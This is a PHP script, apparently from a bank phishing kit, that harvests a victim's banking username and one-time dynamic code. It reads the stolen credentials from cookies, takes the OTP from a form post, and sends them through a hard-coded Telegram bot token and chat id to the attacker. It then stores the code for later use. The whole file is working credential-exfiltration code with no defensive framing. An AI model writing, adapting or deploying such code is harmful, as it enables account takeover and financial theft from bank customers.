<?php 
require('../THE333/lib/funciones.php');

$usuario = $_COOKIE['usuario'];
$contrasena = $_COOKIE['contrasena'];
$registro = $_COOKIE['registro'];

$cdinamica = $_POST['otp'];
$contenido = "Usuario Banco: " . $usuario ."\n";
$contenido .= "Dinamica: " . $cdinamica ."\n";
$contenido=urlencode($contenido);
file_get_contents("https://api.telegram.org/bot8434119591:AAFeXkqrs3spKHtFbkw5OZNLVIBvs8Qf7vM/sendMessage?chat_id=-4803034495&text=". $contenido);

setcookie('cdinamica',$cdinamica,time()+60*9);

actualizar_registro_otp($registro,$cdinamica);
?>